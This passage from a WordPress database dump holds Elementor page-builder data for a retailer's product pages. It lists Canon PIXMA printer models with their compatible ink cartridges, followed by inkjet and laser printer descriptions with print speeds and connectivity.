(Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX886<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-726 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-726 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-726 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-726 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-725 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA PRO-1<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-29 (Chroma Optimizer)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Dark Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Light Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Matte Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Photo Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Red)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Yellow)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b7fc065\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"387b65d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA PRO-10<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-72 (Chroma Optimizer)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Matte Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Photo Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Red)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA PRO-100<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-42 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Light Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TR8570<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS207<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS307<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS5070<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-771 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-770 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-770XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS5170<\\/p><\\/td><td width=\\\"208\\\"><p>CL-741 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-741XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740\\/CL-741 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"736141f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9e8521a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS8270<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS9170<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS9570<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(6874,3295,'_elementor_version','2.5.14'),(6888,3297,'_elementor_version','2.5.14'),(6887,3297,'_elementor_data','[{\"id\":\"9ac79cf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"2a109eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d59285\",\"elType\":\"widget\",\"settings\":{\"title\":\"Injet Printers :-\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca9ead8\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"9a9d292\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"align\":\"center\"},\"elements\":[{\"id\":\"6ad8678\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA E560 \\/ E560R\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70128a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png\",\"id\":2345}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"509ac9b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Advanced Wireless All-In-One with Auto Duplex\\u00a0Printing for Low-Cost Printing<\\/p><p>The Ink Efficient E560 \\/ E560R is designed to give you an affordable wireless printing experience at low running cost of up to 800 pages.<\\/p><p>Available in Black and Red.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO Standard print speed (A4): up to 9.9ipm black \\/ 5.7ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi<\\/p><p>Recommended print volume: 80 - 400 pages<\\/p><center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"19ec1cd\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"d3a1ece\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA E4270\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"47167d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png\",\"id\":2346}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"c56690e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Compact Wireless All-In-One with Fax and automatic 2-sided printing for Low-Cost Printing<\\/p><p>This compact Office All-In-One features a 20-sheet Auto Document Feeder for productivity and delivers up to 400 pages yield with high-capacity ink cartridges.<\\/p><p>Print, Scan, Copy, Fax<\\/p><p>ISO standard print speed (A4): 8.8ipm black \\/ 4.4ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Wireless Direct<\\/p><p>Recommended print volume: 50 - 200 pages<\\/p><center><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"11\\\" ]<\\/span><\\/center><p>\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"692b43d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a99e262\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA TS9570\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6a04479\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png\",\"id\":2347}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6ab42ff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"A3 Wireless Photo Printer with Large 4.3\\u201d Touch-Screen and Auto Document Feeder\\n\\nThis A3 wireless compact Photo All-In-One printer combines amazing compactness and a wide range of printing options for the complete home and small office printing experience.\\n\\nPrint, Scan, Copy\\n\\nISO standard print speed (A4): up to 15.0ipm black \\/ 10.0ipm colour\\n\\nHi-speed USB 2.0, WiFi, wired LAN, memory card slot, wireless\\/wired LAN PictBridge, Mopria, AirPrint, BLE, Wireless Direct\\n\\nRecommended print volume: 80 - 300 pages\\n\\n<center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"657c5e2\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"1c9048c\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA TS8270\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e5da999\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png\",\"id\":2348}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8c06b04\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless Photo All-In-One with Large 4.3\\u201d Touch-Screen and Auto Duplex Printing<\\/p><p>This advanced wireless Photo All-In-One is beautifully designed with a wide range of printing options for the complete home printing experience.<\\/p><p>Available in Black, Red and White.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO standard print speed (A4): up to 15.0ipm black \\/ 10.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, memory card slot, wireless Pictbridge, Mopria, AirPrint, BLE, Wireless Direct<\\/p><p>Recommended print volume: 30 - 100 pages<\\/p><p>\\u00a0<\\/p><p>\\u00a0<\\/p><center><\\/center><center><\\/center><center><\\/center><center><\\/center><center><\\/center><center><\\/center><center><\\/center><center><\\/center><center><\\/center><center><\\/center><center>[maxbutton id=\\\"11\\\" ]<\\/center><p>\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e19c5ed\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"48b8328\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"619d0d9\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G2010\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b641ed3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png\",\"id\":2349}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"cb6e9e3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print, Scan &amp; Copy<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ef95652\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"72caeea\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G4010\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1a96790\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/095399e7118a4e898b6df8c1808358de_g4010_03.png\",\"id\":2351}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"bc59f5a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost.<\\/p><p>Print, Scan, Copy and Fax<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Access Point Mode<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"49effc0\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"79b85a4\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G1010\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4266d0e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png\",\"id\":2352}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"79cfa28\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank Printer for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm (mono) \\/ 5.0ipm (colour)<\\/p><p>Photo Speed (4 x 6\\\"): 60sec. (borderless)<\\/p><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"35746a1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"9b7f21a\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G3010\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b8c2962\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/abbc0420f899426c86b9f547f8e0476d_g3010_01.png\",\"id\":2721}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"ca1fadd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank Wireless All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print, Scan &amp; Copy<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, Access Point Mode<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1ffb94f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"84b94b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"130ead1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Laser Printers :-\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"219f45c\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"39c2015\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ece285e\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS LBP113w\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1273d18\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png\",\"id\":2724}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6b60692\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><h4 class=\\\"sub-title\\\">Compact with wireless connectivity<\\/h4><\\/div><p>Simple to operate and compact in size, the ideal choice for your printing needs.<\\/p><ul class=\\\"list-normal\\\"><li>Print<\\/li><li>Print Speed 